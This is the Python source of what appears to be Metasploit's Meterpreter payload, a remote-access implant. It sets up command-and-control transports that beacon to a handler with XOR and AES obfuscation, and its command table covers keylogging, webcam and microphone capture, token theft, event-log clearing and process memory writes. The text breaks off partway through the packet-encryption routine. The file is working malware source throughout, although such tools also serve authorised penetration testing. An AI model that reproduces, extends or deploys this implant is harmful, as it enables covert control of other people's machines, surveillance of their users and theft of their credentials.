has_windll = hasattr(ctypes, 'windll')
try:
urllib_imports = ['ProxyBasicAuthHandler', 'ProxyHandler', 'HTTPSHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
# reseed the random generator.
random.seed()
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
TRY_TO_FORK = True
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
HTTP_COOKIE = None
HTTP_HOST = None
HTTP_REFERER = None
PAYLOAD_UUID = ''
SESSION_GUID = ''
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_COMMAND_ID = TLV_META_TYPE_UINT | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_HEADERS = TLV_META_TYPE_STRING | 441
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 442
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_SESSION_GUID = TLV_META_TYPE_RAW | 462
TLV_TYPE_RSA_PUB_KEY = TLV_META_TYPE_RAW | 550
TLV_TYPE_SYM_KEY_TYPE = TLV_META_TYPE_UINT | 551
TLV_TYPE_SYM_KEY = TLV_META_TYPE_RAW | 552
TLV_TYPE_ENC_SYM_KEY = TLV_META_TYPE_RAW | 553
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
ENC_NONE = 0
ENC_AES256 = 1
# Packet header sizes
PACKET_XOR_KEY_SIZE = 4
PACKET_SESSION_GUID_SIZE = 16
PACKET_ENCRYPT_FLAG_SIZE = 4
PACKET_LENGTH_SIZE = 4
PACKET_TYPE_SIZE = 4
PACKET_LENGTH_OFF = (PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE +
PACKET_ENCRYPT_FLAG_SIZE)
PACKET_HEADER_SIZE = (PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE +
PACKET_ENCRYPT_FLAG_SIZE + PACKET_LENGTH_SIZE + PACKET_TYPE_SIZE)
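# For reference, the wire layout implied by the sizes above is:
#   offset  0: XOR key          (4 bytes)
#   offset  4: session GUID     (16 bytes)
#   offset 20: encryption flag  (4 bytes)
#   offset 24: packet length    (4 bytes)   <- PACKET_LENGTH_OFF = 24
#   offset 28: packet type      (4 bytes)
#   offset 32: TLV payload starts here      <- PACKET_HEADER_SIZE = 32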
# ---------------------------------------------------------------
# --- THIS CONTENT WAS GENERATED BY A TOOL @ 2020-05-01 05:29:59 UTC
EXTENSION_ID_CORE = 0
EXTENSION_ID_STDAPI = 1000
COMMAND_IDS = (
(1, 'core_channel_close'),
(2, 'core_channel_eof'),
(3, 'core_channel_interact'),
(4, 'core_channel_open'),
(5, 'core_channel_read'),
(6, 'core_channel_seek'),
(7, 'core_channel_tell'),
(8, 'core_channel_write'),
(9, 'core_console_write'),
(10, 'core_enumextcmd'),
(11, 'core_get_session_guid'),
(12, 'core_loadlib'),
(13, 'core_machine_id'),
(14, 'core_migrate'),
(15, 'core_native_arch'),
(16, 'core_negotiate_tlv_encryption'),
(17, 'core_patch_url'),
(18, 'core_pivot_add'),
(19, 'core_pivot_remove'),
(20, 'core_pivot_session_died'),
(21, 'core_set_session_guid'),
(22, 'core_set_uuid'),
(23, 'core_shutdown'),
(24, 'core_transport_add'),
(25, 'core_transport_change'),
(26, 'core_transport_getcerthash'),
(27, 'core_transport_list'),
(28, 'core_transport_next'),
(29, 'core_transport_prev'),
(30, 'core_transport_remove'),
(31, 'core_transport_setcerthash'),
(32, 'core_transport_set_timeouts'),
(33, 'core_transport_sleep'),
(1001, 'stdapi_fs_chdir'),
(1002, 'stdapi_fs_chmod'),
(1003, 'stdapi_fs_delete_dir'),
(1004, 'stdapi_fs_delete_file'),
(1005, 'stdapi_fs_file_copy'),
(1006, 'stdapi_fs_file_expand_path'),
(1007, 'stdapi_fs_file_move'),
(1008, 'stdapi_fs_getwd'),
(1009, 'stdapi_fs_ls'),
(1010, 'stdapi_fs_md5'),
(1011, 'stdapi_fs_mkdir'),
(1012, 'stdapi_fs_mount_show'),
(1013, 'stdapi_fs_search'),
(1014, 'stdapi_fs_separator'),
(1015, 'stdapi_fs_sha1'),
(1016, 'stdapi_fs_stat'),
(1017, 'stdapi_net_config_add_route'),
(1018, 'stdapi_net_config_get_arp_table'),
(1019, 'stdapi_net_config_get_interfaces'),
(1020, 'stdapi_net_config_get_netstat'),
(1021, 'stdapi_net_config_get_proxy'),
(1022, 'stdapi_net_config_get_routes'),
(1023, 'stdapi_net_config_remove_route'),
(1024, 'stdapi_net_resolve_host'),
(1025, 'stdapi_net_resolve_hosts'),
(1026, 'stdapi_net_socket_tcp_shutdown'),
(1027, 'stdapi_net_tcp_channel_open'),
(1028, 'stdapi_railgun_api'),
(1029, 'stdapi_railgun_api_multi'),
(1030, 'stdapi_railgun_memread'),
(1031, 'stdapi_railgun_memwrite'),
(1032, 'stdapi_registry_check_key_exists'),
(1033, 'stdapi_registry_close_key'),
(1034, 'stdapi_registry_create_key'),
(1035, 'stdapi_registry_delete_key'),
(1036, 'stdapi_registry_delete_value'),
(1037, 'stdapi_registry_enum_key'),
(1038, 'stdapi_registry_enum_key_direct'),
(1039, 'stdapi_registry_enum_value'),
(1040, 'stdapi_registry_enum_value_direct'),
(1041, 'stdapi_registry_load_key'),
(1042, 'stdapi_registry_open_key'),
(1043, 'stdapi_registry_open_remote_key'),
(1044, 'stdapi_registry_query_class'),
(1045, 'stdapi_registry_query_value'),
(1046, 'stdapi_registry_query_value_direct'),
(1047, 'stdapi_registry_set_value'),
(1048, 'stdapi_registry_set_value_direct'),
(1049, 'stdapi_registry_unload_key'),
(1050, 'stdapi_sys_config_driver_list'),
(1051, 'stdapi_sys_config_drop_token'),
(1052, 'stdapi_sys_config_getenv'),
(1053, 'stdapi_sys_config_getprivs'),
(1054, 'stdapi_sys_config_getsid'),
(1055, 'stdapi_sys_config_getuid'),
(1056, 'stdapi_sys_config_localtime'),
(1057, 'stdapi_sys_config_rev2self'),
(1058, 'stdapi_sys_config_steal_token'),
(1059, 'stdapi_sys_config_sysinfo'),
(1060, 'stdapi_sys_eventlog_clear'),
(1061, 'stdapi_sys_eventlog_close'),
(1062, 'stdapi_sys_eventlog_numrecords'),
(1063, 'stdapi_sys_eventlog_oldest'),
(1064, 'stdapi_sys_eventlog_open'),
(1065, 'stdapi_sys_eventlog_read'),
(1066, 'stdapi_sys_power_exitwindows'),
(1067, 'stdapi_sys_process_attach'),
(1068, 'stdapi_sys_process_close'),
(1069, 'stdapi_sys_process_execute'),
(1070, 'stdapi_sys_process_get_info'),
(1071, 'stdapi_sys_process_get_processes'),
(1072, 'stdapi_sys_process_getpid'),
(1073, 'stdapi_sys_process_image_get_images'),
(1074, 'stdapi_sys_process_image_get_proc_address'),
(1075, 'stdapi_sys_process_image_load'),
(1076, 'stdapi_sys_process_image_unload'),
(1077, 'stdapi_sys_process_kill'),
(1078, 'stdapi_sys_process_memory_allocate'),
(1079, 'stdapi_sys_process_memory_free'),
(1080, 'stdapi_sys_process_memory_lock'),
(1081, 'stdapi_sys_process_memory_protect'),
(1082, 'stdapi_sys_process_memory_query'),
(1083, 'stdapi_sys_process_memory_read'),
(1084, 'stdapi_sys_process_memory_unlock'),
(1085, 'stdapi_sys_process_memory_write'),
(1086, 'stdapi_sys_process_thread_close'),
(1087, 'stdapi_sys_process_thread_create'),
(1088, 'stdapi_sys_process_thread_get_threads'),
(1089, 'stdapi_sys_process_thread_open'),
(1090, 'stdapi_sys_process_thread_query_regs'),
(1091, 'stdapi_sys_process_thread_resume'),
(1092, 'stdapi_sys_process_thread_set_regs'),
(1093, 'stdapi_sys_process_thread_suspend'),
(1094, 'stdapi_sys_process_thread_terminate'),
(1095, 'stdapi_sys_process_wait'),
(1096, 'stdapi_ui_desktop_enum'),
(1097, 'stdapi_ui_desktop_get'),
(1098, 'stdapi_ui_desktop_screenshot'),
(1099, 'stdapi_ui_desktop_set'),
(1100, 'stdapi_ui_enable_keyboard'),
(1101, 'stdapi_ui_enable_mouse'),
(1102, 'stdapi_ui_get_idle_time'),
(1103, 'stdapi_ui_get_keys_utf8'),
(1104, 'stdapi_ui_send_keyevent'),
(1105, 'stdapi_ui_send_keys'),
(1106, 'stdapi_ui_send_mouse'),
(1107, 'stdapi_ui_start_keyscan'),
(1108, 'stdapi_ui_stop_keyscan'),
(1109, 'stdapi_ui_unlock_desktop'),
(1110, 'stdapi_webcam_audio_record'),
(1111, 'stdapi_webcam_get_frame'),
(1112, 'stdapi_webcam_list'),
(1113, 'stdapi_webcam_start'),
(1114, 'stdapi_webcam_stop'),
(1115, 'stdapi_audio_mic_start'),
(1116, 'stdapi_audio_mic_stop'),
(1117, 'stdapi_audio_mic_list'),
)
# ---------------------------------------------------------------
class SYSTEM_INFO(ctypes.Structure):
_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
("wReserved", ctypes.c_uint16),
("dwPageSize", ctypes.c_uint32),
("lpMinimumApplicationAddress", ctypes.c_void_p),
("lpMaximumApplicationAddress", ctypes.c_void_p),
("dwActiveProcessorMask", ctypes.c_uint32),
("dwNumberOfProcessors", ctypes.c_uint32),
("dwProcessorType", ctypes.c_uint32),
("dwAllocationGranularity", ctypes.c_uint32),
("wProcessorLevel", ctypes.c_uint16),
("wProcessorRevision", ctypes.c_uint16)]
def rand_bytes(n):
return os.urandom(n)
def rand_xor_key():
return tuple(random.randint(1, 255) for _ in range(4))
def xor_bytes(key, data):
if sys.version_info[0] < 3:
dexored = ''.join(chr(ord(data[i]) ^ key[i % len(key)]) for i in range(len(data)))
else:
dexored = bytes(data[i] ^ key[i % len(key)] for i in range(len(data)))
return dexored
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32))
@export
def cmd_id_to_string(this_id):
for that_id, that_string in COMMAND_IDS:
if this_id == that_id:
return that_string
debug_print('[*] failed to lookup string for command id: ' + str(this_id))
return None
@export
def cmd_string_to_id(this_string):
for that_id, that_string in COMMAND_IDS:
if this_string == that_string:
return that_id
debug_print('[*] failed to lookup id for command string: ' + this_string)
return None
@export
def crc16(data):
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
@export
def debug_print(msg):
if DEBUGGING:
print(msg)
@export
def debug_traceback(msg=None):
if DEBUGGING:
if msg:
print(msg)
traceback.print_exc(file=sys.stderr)
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export
def get_hdd_label():
for _, _, files in os.walk('/dev/disk/by-id/'):
for f in files:
for p in ['ata-', 'mb-']:
if f[:len(p)] == p:
return f[len(p):]
return ''
@export
def get_native_arch():
arch = get_system_arch()
if arch == 'x64' and ctypes.sizeof(ctypes.c_void_p) == 4:
arch = 'x86'
return arch
@export
def get_system_arch():
uname_info = platform.uname()
arch = uname_info[4]
if has_windll:
sysinfo = SYSTEM_INFO()
ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
values = {0:'x86', 5:'armle', 6:'IA64', 9:'x64'}
arch = values.get(sysinfo.wProcessorArchitecture, uname_info[4])
if arch == 'x86_64':
arch = 'x64'
return arch
@export
def inet_pton(family, address):
if family == socket.AF_INET6 and '%' in address:
address = address.split('%', 1)[0]
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_enum_tlvs(pkt, tlv_type=None):
offset = 0
while offset < len(pkt):
tlv = struct.unpack('>II', pkt[offset:offset + 8])
if tlv_type is None or (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
val = pkt[offset + 8:(offset + 8 + (tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type': tlv[1], 'length': tlv[0], 'value': val}
offset += tlv[0]
return
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
@export
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
@export
def tlv_pack_request(method, parts=None):
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_COMMAND_ID, cmd_string_to_id(method))
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
parts = parts or []
for part in parts:
pkt += tlv_pack(part['type'], part['value'])
return pkt
#@export
class MeterpreterChannel(object):
def core_close(self, request, response):
self.close()
return ERROR_SUCCESS, response
def core_eof(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, self.eof())
return ERROR_SUCCESS, response
def core_read(self, request, response):
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, self.read(length))
return ERROR_SUCCESS, response
def core_write(self, request, response):
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
response += tlv_pack(TLV_TYPE_LENGTH, self.write(channel_data))
return ERROR_SUCCESS, response
def close(self):
raise NotImplementedError()
def eof(self):
return False
def is_alive(self):
return True
def notify(self):
return None
def read(self, length):
raise NotImplementedError()
def write(self, data):
raise NotImplementedError()
#@export
class MeterpreterFile(MeterpreterChannel):
def __init__(self, file_obj):
self.file_obj = file_obj
super(MeterpreterFile, self).__init__()
def close(self):
self.file_obj.close()
def eof(self):
return self.file_obj.tell() >= os.fstat(self.file_obj.fileno()).st_size
def read(self, length):
return self.file_obj.read(length)
def write(self, data):
self.file_obj.write(data)
return len(data)
export(MeterpreterFile)
#@export
class MeterpreterProcess(MeterpreterChannel):
def __init__(self, proc_h):
self.proc_h = proc_h
super(MeterpreterProcess, self).__init__()
def close(self):
self.proc_h.kill()
if hasattr(self.proc_h.stdin, 'close'):
self.proc_h.stdin.close()
if hasattr(self.proc_h.stdout, 'close'):
self.proc_h.stdout.close()
if hasattr(self.proc_h.stderr, 'close'):
self.proc_h.stderr.close()
def is_alive(self):
return self.proc_h.poll() is None
def read(self, length):
data = ''
stdout_reader = self.proc_h.stdout_reader
if stdout_reader.is_read_ready():
data = stdout_reader.read(length)
return data
def write(self, data):
self.proc_h.write(data)
return len(data)
export(MeterpreterProcess)
#@export
class MeterpreterSocket(MeterpreterChannel):
def __init__(self, sock):
self.sock = sock
self._is_alive = True
super(MeterpreterSocket, self).__init__()
def core_write(self, request, response):
try:
status, response = super(MeterpreterSocket, self).core_write(request, response)
except socket.error:
self.close()
self._is_alive = False
status = ERROR_FAILURE
return status, response
def close(self):
return self.sock.close()
def fileno(self):
return self.sock.fileno()
def is_alive(self):
return self._is_alive
def read(self, length):
return self.sock.recv(length)
def write(self, data):
return self.sock.send(data)
export(MeterpreterSocket)
#@export
class MeterpreterSocketTCPClient(MeterpreterSocket):
pass
export(MeterpreterSocketTCPClient)
#@export
class MeterpreterSocketTCPServer(MeterpreterSocket):
pass
export(MeterpreterSocketTCPServer)
#@export
class MeterpreterSocketUDPClient(MeterpreterSocket):
def __init__(self, sock, peer_address=None):
super(MeterpreterSocketUDPClient, self).__init__(sock)
self.peer_address = peer_address
def core_write(self, request, response):
peer_host = packet_get_tlv(request, TLV_TYPE_PEER_HOST).get('value')
peer_port = packet_get_tlv(request, TLV_TYPE_PEER_PORT).get('value')
if peer_host and peer_port:
peer_address = (peer_host, peer_port)
elif self.peer_address:
peer_address = self.peer_address
else:
raise RuntimeError('peer_host and peer_port must be specified with an unbound/unconnected UDP channel')
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
try:
length = self.sock.sendto(channel_data, peer_address)
except socket.error:
self.close()
self._is_alive = False
status = ERROR_FAILURE
else:
response += tlv_pack(TLV_TYPE_LENGTH, length)
status = ERROR_SUCCESS
return status, response
def read(self, length):
return self.sock.recvfrom(length)[0]
def write(self, data):
self.sock.sendto(data, self.peer_address)
export(MeterpreterSocketUDPClient)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def peek(self, l = None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
else:
data = self.data[0:l]
self.data_lock.release()
return data
def read(self, l = None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
#@export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
debug_print('[*] starting process: ' + repr(args[0]))
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
def is_alive(self):
return self.poll() is None
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, self.is_alive)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, self.is_alive)
self.stderr_reader.start()
def write(self, channel_data):
length = self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
return length
export(STDProcess)
class Transport(object):
def __init__(self):
self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
self.communication_last = 0
self.retry_total = SESSION_RETRY_TOTAL
self.retry_wait = SESSION_RETRY_WAIT
self.request_retire = False
self.aes_enabled = False
self.aes_key = None
def __repr__(self):
return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@property
def communication_has_expired(self):
return self.communication_last + self.communication_timeout < time.time()
@property
def should_retire(self):
return self.communication_has_expired or self.request_retire
@staticmethod
def from_request(request):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if url.startswith('tcp'):
transport = TcpTransport(url)
elif url.startswith('http'):
proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
http_headers = packet_get_tlv(request, TLV_TYPE_TRANS_HEADERS).get('value', None)
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
if http_headers:
headers = {}
for h in http_headers.strip().split("\r\n"):
p = h.split(':')
headers[p[0].upper()] = ':'.join(p[1:]).strip()
http_host = headers.get('HOST')
http_cookie = headers.get('COOKIE')
http_referer = headers.get('REFERER')
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent, http_host=http_host,
http_cookie=http_cookie, http_referer=http_referer)
transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value', SESSION_COMMUNICATION_TIMEOUT)
transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value', SESSION_RETRY_TOTAL)
transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT)
return transport
def _activate(self):
return True
def activate(self):
self.aes_key = None
self.aes_enabled = False
end_time = time.time() + self.retry_total
while time.time() < end_time:
try:
activate_succeeded = self._activate()
except:
activate_succeeded = False
if activate_succeeded:
self.communication_last = time.time()
return True
time.sleep(self.retry_wait)
return False
def _deactivate(self):
return
def deactivate(self):
try:
self._deactivate()
except:
pass
self.communication_last = 0
return True
def decrypt_packet(self, pkt):
if pkt and len(pkt) > PACKET_HEADER_SIZE:
xor_key = struct.unpack('BBBB', pkt[:PACKET_XOR_KEY_SIZE])
raw = xor_bytes(xor_key, pkt)
enc_offset = PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE
enc_flag = struct.unpack('>I', raw[enc_offset:enc_offset+PACKET_ENCRYPT_FLAG_SIZE])[0]
if enc_flag == ENC_AES256:
iv = raw[PACKET_HEADER_SIZE:PACKET_HEADER_SIZE+16]
encrypted = raw[PACKET_HEADER_SIZE+len(iv):]
return met_aes_decrypt(self.aes_key, iv, encrypted)
else:
return raw[PACKET_HEADER_SIZE:]
return None
def get_packet(self):
self.request_retire = False
try:
pkt = self.decrypt_packet(self._get_packet())
except:
debug_traceback()
return None
if pkt is None:
return None
self.communication_last = time.time()
return pkt
def encrypt_packet(self, pkt):
        # Every outgoing packet carries the session GUID and an encryption flag.
        # Until an AES key has been negotiated and enabled, the flag is ENC_NONE
        # and the TLV body is sent without encryption (only XOR obfuscation).
enc_type = ENC_NONE
if self.aes_key:
            # The encryption key is present, but we should only use the key
# when it is enabled. If we use it before it's enabled, then we
# end up encrypting the packet that contains the key before
# sending it back to MSF, and it won't be able to decrypt it yet.
if self.aes_enabled:
iv = rand_bytes(16)
enc = iv + met_aes_encrypt(self.aes_key, iv, pkt[8:])
hdr = struct.pack('>I', len(enc) + 8) + pkt[4:8]
pkt = hdr + enc
# We change the packet encryption type to tell MSF that
# the packet is encrypted.
enc_type = ENC_AES256
else:
# If we get here, it means that the AES encryption key
# is ready to use from this point onwards as the last
# plain text packet has been sent back to MSF containing
# the key, and so MSF will be able to handle encrypted
# communications from here.
self.aes_enabled = True
xor_key = rand_xor_key()
raw = binascii.a2b_hex(bytes(SESSION_GUID, 'UTF-8')) + struct.pack('>I', enc_type) + pkt
